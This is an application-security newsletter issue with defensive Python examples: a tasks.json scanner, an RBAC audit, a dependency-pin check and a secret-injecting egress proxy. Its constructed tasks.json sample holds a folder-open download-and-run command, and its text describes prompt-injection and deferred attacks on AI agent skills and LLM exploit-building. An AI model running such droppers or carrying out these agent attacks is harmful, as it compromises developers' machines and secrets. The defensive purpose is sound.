Issue #17 - AppSec Weekly 🛡️
Your go-to source for the latest in application security trends, tools, and insights for the third week of January 2026!

AppSec Weekly - Jan 2026
🌶️ 🌶️ This Week in AppSec World 🌶️ 🌶️
A 25-minute BGP misconfiguration in Miami leaked internal IPv6 routes to peers and providers, causing congestion, packet loss, and 12 Gbps of dropped traffic for both Cloudflare customers and external networks. The incident mirrored a 2020 outage and highlights why RPKI origin validation and ASPA (AS path authorization) matter: origin validation rejects announcements from the wrong AS, while ASPA is what catches a route leak, where the origin is legitimate but the path is not, before leaked routes redirect or blackhole traffic across the Internet.
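To make the distinction concrete, here is an added example (not code from the newsletter or from Cloudflare) that implements RFC 6811 route origin validation and a simplified ASPA check for routes learned from a customer. The ROAs, ASPA records, ASNs and prefixes are constructed; a production validator takes them from an RPKI cache over RTR and implements the full ASPA algorithm for routes learned from providers and peers as well.

```python
# Added example (not from the newsletter or from Cloudflare): RPKI origin
# validation per RFC 6811 plus a simplified ASPA check for routes learned
# from a customer. ROAs, ASPA records, ASNs and prefixes below are
# constructed; a real validator takes them from an RPKI cache over RTR.
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Roa:
    prefix: str       # covering prefix, e.g. "2001:db8::/32"
    max_length: int   # longest more-specific the origin may announce
    origin_as: int


def rov(prefix: str, origin_as: int, roas) -> str:
    """Route Origin Validation: 'Valid', 'Invalid' or 'NotFound'."""
    net = ipaddress.ip_network(prefix)
    covering = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix)
        if roa_net.version == net.version and net.subnet_of(roa_net):
            covering.append(roa)
    if not covering:
        return "NotFound"          # no ROA says anything about this space
    for roa in covering:
        if roa.origin_as == origin_as and net.prefixlen <= roa.max_length:
            return "Valid"
    return "Invalid"               # wrong origin or too-specific announcement


def aspa_from_customer(as_path, receiver_as: int, aspa) -> str:
    """Simplified ASPA check for a route received from a customer.

    as_path is in BGP order (neighbour first, origin last). Walking from
    the origin towards the receiver, every hop must be customer -> provider,
    so each AS must list the next AS as an authorised provider. aspa maps
    customer ASN -> set of provider ASNs. A hop through an AS without an
    ASPA record yields 'Unknown'; a hop to a non-provider yields 'Invalid'
    (a route leak). This is the upstream case only, not the full
    valley-free algorithm used for routes learned from providers/peers.
    """
    hops = []
    for asn in as_path:            # collapse prepending (64500 64500 64500)
        if not hops or hops[-1] != asn:
            hops.append(asn)
    chain = list(reversed(hops)) + [receiver_as]
    unknown = False
    for customer, provider in zip(chain, chain[1:]):
        providers = aspa.get(customer)
        if providers is None:
            unknown = True
        elif provider not in providers:
            return "Invalid"
    return "Unknown" if unknown else "Valid"


# Constructed data. 64502 is a transit provider whose customer 64501 has a
# customer 64500; 64510 is a peer of 64501 that buys transit from 64520.
ROAS = [Roa("2001:db8::/32", 48, 64500)]
ASPA = {64500: {64501, 64510}, 64501: {64502}, 64510: {64520}}

if __name__ == "__main__":
    print(rov("2001:db8:1::/48", 64500, ROAS))          # Valid
    print(rov("2001:db8:1::/64", 64500, ROAS))          # Invalid: beyond maxLength
    print(rov("2001:db8::/32", 64666, ROAS))            # Invalid: wrong origin
    print(aspa_from_customer([64501, 64500], 64502, ASPA))         # Valid
    print(aspa_from_customer([64501, 64510, 64500], 64502, ASPA))  # Invalid: 64510 leaked to its peer
```

Note that the leaked path in the last line still carries the legitimate origin 64500, so `rov` alone would return Valid for it; only the path check flags it.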
Chromium's C++ guidelines ban std::bind, std::function, std::shared_ptr, exceptions, std::regex, and the standard thread library in favor of base:: equivalents that prevent lifetime bugs. The guide also blocks std::filesystem, std::any, and certain template patterns because they cause security issues or have poor compiler support.
North Korean hackers are using fake job interviews to trick developers into cloning repos that contain poisoned tasks.json files—when you open the project in VS Code and click "trust," it quietly downloads a JavaScript backdoor. The attack sidesteps traditional malware defenses by riding on legitimate developer workflows, and because the payloads get hosted on places like Vercel, most security tools don't flag them until credentials and source code are already gone.
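A quick check to run before clicking "trust" on a cloned repo, as an added example that is not part of the original post: it parses `.vscode/tasks.json`, flags tasks configured with `runOptions.runOn: "folderOpen"` (the setting that makes a task fire as soon as a trusted folder opens) and tasks whose command looks like a download-and-run. The sample tasks.json is constructed and the payload URL uses a reserved `.invalid` domain.

```python
# Added example (not from the article it summarises): flag VS Code tasks
# that fire automatically on folder open or whose command looks like a
# dropper. The tasks.json below is constructed; the URL is an .invalid
# domain and not a real payload host.
import json
import os
import re

SUSPECT = re.compile(
    r"(curl|wget|Invoke-WebRequest|iwr|node\s+-e|powershell|bash\s+-c|"
    r"base64|https?://)",
    re.IGNORECASE,
)


def _command_text(task) -> str:
    """Flatten command (string or {"value": ...}) plus args into one string."""
    cmd = task.get("command", "")
    if isinstance(cmd, dict):
        cmd = cmd.get("value", "")
    args = []
    for a in task.get("args", []):
        args.append(a.get("value", "") if isinstance(a, dict) else str(a))
    return " ".join([str(cmd)] + args)


def flag_tasks(tasks_json: str):
    """Return (label, reason) pairs for tasks worth a human look."""
    # Real tasks.json files are JSONC; strip comments before parsing them.
    doc = json.loads(tasks_json)
    findings = []
    for task in doc.get("tasks", []):
        label = task.get("label", "<unnamed>")
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append((label, "runs on folderOpen once the folder is trusted"))
        hit = SUSPECT.search(_command_text(task))
        if hit:
            findings.append((label, f"command contains '{hit.group(0)}'"))
    return findings


def scan_repo(repo_dir: str):
    """Scan <repo>/.vscode/tasks.json if present; empty list otherwise."""
    path = os.path.join(repo_dir, ".vscode", "tasks.json")
    if not os.path.exists(path):
        return []
    with open(path, encoding="utf-8") as fh:
        return flag_tasks(fh.read())


SAMPLE = """{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://cdn.example.invalid/s.js -o /tmp/s.js && node /tmp/s.js",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""

if __name__ == "__main__":
    for label, reason in flag_tasks(SAMPLE):
        print(f"{label}: {reason}")
```

The regex is a heuristic, not a detector; the reliable signal is the `folderOpen` trigger itself, which a legitimate build task rarely needs.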
The nodes/proxy GET permission—used by 69 Helm charts including Prometheus, Datadog, and Grafana—lets you execute code in any Pod because the Kubelet authorizes based on the WebSocket handshake's HTTP GET instead of checking if you have CREATE permissions for the actual exec operation. Kubernetes closed this as "won't fix" and pointed to KEP-2862 as the solution, but that KEP doesn't even cover /exec endpoints and the underlying authorization bug remains unfixed.
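Since the bug is "won't fix", the practical control is knowing who holds the permission. Below is an added audit script (not from the research post) that flags RBAC rules granting get on nodes/proxy, including the wildcard spellings the authorizer accepts, and lists the subjects bound to those roles. The ClusterRole and ClusterRoleBinding objects are constructed to mimic `kubectl get clusterroles,clusterrolebindings -o json`; piping real output into the script is the intended use.

```python
# Added example (not from the research post): find RBAC roles that grant
# get on nodes/proxy and the subjects bound to them. The role and binding
# objects below are constructed to mimic `kubectl get clusterroles,
# clusterrolebindings -o json`; a real run would feed that output in.
import json
import sys

# Resource spellings the RBAC authorizer matches for the nodes/proxy subresource.
PROXY_RESOURCES = {"nodes/proxy", "nodes/*", "*/proxy", "*"}


def rule_grants_nodes_proxy(rule) -> bool:
    """True if one RBAC rule allows GET on the nodes/proxy subresource."""
    groups = rule.get("apiGroups", [])
    in_core = "" in groups or "*" in groups      # nodes live in the core group
    res = any(r in PROXY_RESOURCES for r in rule.get("resources", []))
    verb = any(v in ("get", "*") for v in rule.get("verbs", []))
    return in_core and res and verb


def find_nodes_proxy_grants(roles, bindings):
    """Return (role name, subject) pairs where the subject can reach nodes/proxy."""
    risky = {r["metadata"]["name"] for r in roles
             if any(rule_grants_nodes_proxy(x) for x in r.get("rules", []))}
    out = []
    for b in bindings:
        ref = b.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") not in risky:
            continue
        for s in b.get("subjects", []):
            ns = s.get("namespace")
            who = f"{s['kind']} {ns + '/' if ns else ''}{s['name']}"
            out.append((ref["name"], who))
    return sorted(out)


# Constructed objects (fields trimmed to what the audit reads).
ROLES = [
    {"metadata": {"name": "monitoring-agent"},
     "rules": [{"apiGroups": [""], "resources": ["nodes", "nodes/proxy", "services"],
                "verbs": ["get", "list", "watch"]}]},
    {"metadata": {"name": "read-pods"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
]
BINDINGS = [
    {"roleRef": {"kind": "ClusterRole", "name": "monitoring-agent"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "monitoring", "name": "agent"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "read-pods"},
     "subjects": [{"kind": "Group", "name": "developers"}]},
]

if __name__ == "__main__":
    if not sys.stdin.isatty():             # piped `kubectl ... -o json` output
        items = json.load(sys.stdin)["items"]
        roles = [i for i in items if i["kind"] == "ClusterRole"]
        binds = [i for i in items if i["kind"] == "ClusterRoleBinding"]
    else:
        roles, binds = ROLES, BINDINGS
    for role, subject in find_nodes_proxy_grants(roles, binds):
        print(f"{subject} -> {role} (get nodes/proxy: exec in any pod)")
```

Every subject this prints should be treated as cluster-admin-equivalent until the chart is patched to drop nodes/proxy or the service account is isolated.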
The post recommends using JSON schema validation in values.yaml to catch misconfigurations before they hit production, plus defensive defaults that prioritize security over convenience (no hardcoded passwords, no permissive RBAC). Helm charts without schema checks let you accidentally deploy databases with authentication disabled or services exposed to the internet, which is how most Kubernetes security incidents actually happen.
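What such a schema looks like in practice, as an added example that is not the post's own code: the `values.schema.json` below is written as a Python dict so it can be checked offline, with constraints that refuse disabled auth, short passwords, non-ClusterIP services and misspelled keys. Helm validates a chart's values.schema.json itself on install, upgrade, lint and template; the small validator here re-implements only the keywords the schema uses, and both values files are constructed.

```python
# Added example (not from the post): a values.schema.json expressed as a
# Python dict, with secure-by-default constraints, checked against two
# constructed values files. Helm itself validates values.schema.json on
# install/upgrade/lint; the small validator here covers only the keywords
# used below so the example runs offline.

VALUES_SCHEMA = {
    "$schema": "https://json-schema.org/draft-07/schema#",
    "type": "object",
    "additionalProperties": False,          # catches misspelled keys
    "required": ["auth", "service"],
    "properties": {
        "auth": {
            "type": "object",
            "required": ["enabled", "password"],
            "properties": {
                "enabled": {"type": "boolean", "enum": [True]},   # cannot be switched off
                "password": {"type": "string", "minLength": 16},  # no empty/default password
            },
        },
        "service": {
            "type": "object",
            "required": ["type"],
            "properties": {
                "type": {"type": "string", "enum": ["ClusterIP"]},  # never LoadBalancer/NodePort
                "port": {"type": "integer", "minimum": 1, "maximum": 65535},
            },
        },
    },
}

_TYPES = {"object": dict, "string": str, "integer": int, "boolean": bool, "array": list}


def validate(value, schema, path="$"):
    """Return a list of '<path>: <problem>' strings; empty means valid."""
    t = schema.get("type")
    if t and (not isinstance(value, _TYPES[t]) or (t == "integer" and isinstance(value, bool))):
        return [f"{path}: expected {t}"]
    errs = []
    if "enum" in schema and value not in schema["enum"]:
        errs.append(f"{path}: must be one of {schema['enum']}")
    if t == "string" and len(value) < schema.get("minLength", 0):
        errs.append(f"{path}: shorter than minLength {schema['minLength']}")
    if t == "integer":
        if value < schema.get("minimum", value) or value > schema.get("maximum", value):
            errs.append(f"{path}: outside [{schema.get('minimum')}, {schema.get('maximum')}]")
    if t == "object":
        props = schema.get("properties", {})
        for name in schema.get("required", []):
            if name not in value:
                errs.append(f"{path}.{name}: required")
        for name, sub in value.items():
            if name in props:
                errs.extend(validate(sub, props[name], f"{path}.{name}"))
            elif schema.get("additionalProperties", True) is False:
                errs.append(f"{path}.{name}: unknown key (typo?)")
    return errs


# Constructed values files: one that would ship an unauthenticated,
# internet-exposed database, and one that passes.
BAD_VALUES = {
    "auth": {"enabled": False, "password": ""},
    "service": {"type": "LoadBalancer", "port": 5432},
    "replicaCont": 1,
}
GOOD_VALUES = {
    "auth": {"enabled": True, "password": "c0rrect-horse-battery-staple"},
    "service": {"type": "ClusterIP", "port": 5432},
}

if __name__ == "__main__":
    for problem in validate(BAD_VALUES, VALUES_SCHEMA):
        print(problem)
    print("good values:", validate(GOOD_VALUES, VALUES_SCHEMA) or "ok")
```

The `additionalProperties: false` line is the one most charts skip, and it is what turns a silently ignored `replicaCont` typo into a failed install.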
🤖 This Week in AI Security 🤖
Agent Skills let AI agents load third-party capabilities, but a study of 42,000 skills found 26% had vulnerabilities ranging from prompt injection to supply chain attacks. The nastiest issue is deferred attacks: a skill ships with unpinned Python dependencies that look clean during review, then the attacker publishes malicious versions later that execute when the agent runs the script.
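The deferred attack is easy to check for at review time. As an added example (not from the study), the script below reads a skill's requirements file and reports every dependency that can change after review: no exact pin, a pin without a `--hash` (so the downloaded artifact is never verified), or a custom index/find-links source. The requirements text is constructed, the hash is a dummy and the index URL uses a reserved `.invalid` domain.

```python
# Added example (not from the study): audit a skill's pip dependencies for
# the deferred-attack pattern. The requirements text below is constructed
# (the hash is a dummy and the index URL is an .invalid domain).
import re

_SPEC = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?\s*(===|==|~=|>=|<=|!=|>|<)?")
_INDEX_FLAGS = {"-i", "--index-url", "--extra-index-url", "-f", "--find-links"}


def _logical_lines(text: str):
    """Join backslash continuations so `pkg==1.0 \\ --hash=...` is one line."""
    buf, out = "", []
    for raw in text.splitlines():
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
        else:
            out.append(buf + raw)
            buf = ""
    if buf:
        out.append(buf)
    return out


def audit_requirements(text: str):
    """Return (requirement, problem) pairs for specs that can change after review."""
    findings = []
    for logical in _logical_lines(text):
        line = logical.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        if line.startswith("-"):
            if line.split()[0] in _INDEX_FLAGS:
                findings.append((line, "custom index/links: packages resolve from a source the skill author controls"))
            continue
        m = _SPEC.match(line)
        if not m:
            findings.append((line, "unparsed requirement"))
            continue
        name, op = m.group(1), m.group(3)
        if op not in ("==", "==="):
            findings.append((name, "not pinned to an exact version: a later release runs unreviewed"))
        elif "--hash=" not in line:
            findings.append((name, "pinned but no --hash: the downloaded artifact is not verified"))
    return findings


SAMPLE_REQUIREMENTS = """
requests                   # unpinned
pyyaml>=6.0                # lower bound only
cryptography==42.0.5       # pinned, but no hash
numpy==1.26.4 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
--index-url https://pypi.example.invalid/simple
"""

if __name__ == "__main__":
    for what, why in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{what}: {why}")
```

Only the `numpy` line passes: exact version plus hash. Dependencies installed by a `pip install` inside the skill's shell script need the same scrutiny, since they bypass the requirements file entirely.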
curl maintainer Daniel Stenberg killed the HackerOne bug bounty after seven years because AI-generated junk reports were eating the security team alive: 20 submissions in the first three weeks of 2026, none of them actual vulnerabilities. The program paid out $100k and found 87 real bugs, but Stenberg decided removing the financial incentive was the only way to stop people from submitting reports they neither understood nor reproduced.
Opus 4.5 and GPT-5.2 can now turn zero-days into working exploits through trial and error, treating token budgets like assembly lines where you throw compute at vulnerabilities until something breaks through. Exploit development used to require rare expertise, but when LLMs can search solution spaces autonomously and verify success automatically (did the payload call back?), the bottleneck becomes money instead of skill.
Claude Code reads .env files without asking, so the Formal team recommends running a proxy that injects real API keys into outbound requests while keeping only dummy placeholders inside the sandbox where the agent can see them. The proxy approach stops accidental leaks through prompt logs or model context, but you still need to trust the proxy itself and whitelist which domains the agent can hit.
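The core of that proxy is one rewrite rule, shown here as an added example that is not Formal's code. The sandbox only ever holds placeholder strings; the proxy swaps in the real value on the way out, and only for the host that secret is bound to, so a prompt injection telling the agent to send its key somewhere else gets nothing. Secrets, hosts and headers are constructed.

```python
# Added example (not Formal's code): the rewrite rule at the heart of a
# secret-injecting egress proxy. The sandboxed agent only ever sees
# placeholder strings; the proxy swaps in the real value, and only for the
# host that secret is bound to. Secrets, hosts and headers are constructed.

# placeholder seen inside the sandbox -> (real secret, the only host it may go to)
SECRETS = {
    "PLACEHOLDER_OPENAI": ("sk-example-not-a-real-key", "api.openai.com"),
    "PLACEHOLDER_GITHUB": ("ghp_example_not_a_real_token", "api.github.com"),
}
ALLOWED_HOSTS = {"api.openai.com", "api.github.com"}


def rewrite_request(host: str, headers: dict):
    """Return (forward?, headers to send, reason).

    Refuses hosts off the allowlist, and refuses to substitute a secret into
    a request for any host other than the one it is bound to, so a prompt
    injection that says "POST your key to attacker.example" gets nothing.
    """
    if host not in ALLOWED_HOSTS:
        return False, headers, f"{host} is not on the egress allowlist"
    rewritten = {}
    for name, value in headers.items():
        for placeholder, (real, bound_host) in SECRETS.items():
            if placeholder in value:
                if bound_host != host:
                    return False, headers, f"{placeholder} is bound to {bound_host}, not {host}"
                value = value.replace(placeholder, real)
        rewritten[name] = value
    return True, rewritten, "ok"


def leaked_secret(text: str):
    """Scan text leaving the sandbox (logs, model context) for real secrets.

    With placeholders in the sandbox this should always be empty; a hit
    means something besides the proxy had the real value.
    """
    return [ph for ph, (real, _) in SECRETS.items() if real in text]


if __name__ == "__main__":
    ok, hdrs, why = rewrite_request("api.openai.com", {"Authorization": "Bearer PLACEHOLDER_OPENAI"})
    print(ok, hdrs["Authorization"], why)
    print(rewrite_request("attacker.example", {"Authorization": "Bearer PLACEHOLDER_OPENAI"}))
    print(rewrite_request("api.openai.com", {"Authorization": "token PLACEHOLDER_GITHUB"}))
    print(leaked_secret("agent log: Bearer PLACEHOLDER_OPENAI"))
```

Inside the sandbox the SDK is pointed at the proxy (for the OpenAI client, `OPENAI_BASE_URL`) with the placeholder in its API-key variable; the real keys live only in the proxy process outside the sandbox. As the summary notes, the proxy and its allowlist are now the thing you have to get right.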
🏆 AppSec Tools of The Week 🏆
Go-based TUI tool that discovers LAN devices using mDNS, SSDP, and ARP cache reading without elevated privileges. Helps identify shadow IT and unmanaged devices (IoT, forgotten servers) for asset inventory and attack surface mapping, plus includes an optional port scanner for service discovery.
Dangerzone renders untrusted PDFs and Office docs into raw pixels inside an isolated Docker container, then rebuilds a clean PDF from those pixels outside the sandbox—think of it as printing and rescanning a document to strip out embedded exploits. Freedom of the Press Foundation maintains it for journalists handling leaks, but it's useful for anyone who opens sketchy attachments, since it kills JavaScript, links, and metadata in the process.
And that’s a wrap for this week! If you enjoy this curated issue, feel free to forward or share it with your appsec folks, team, hackerclub. For feedback, hugs, bugs or chats drop an email to [email protected]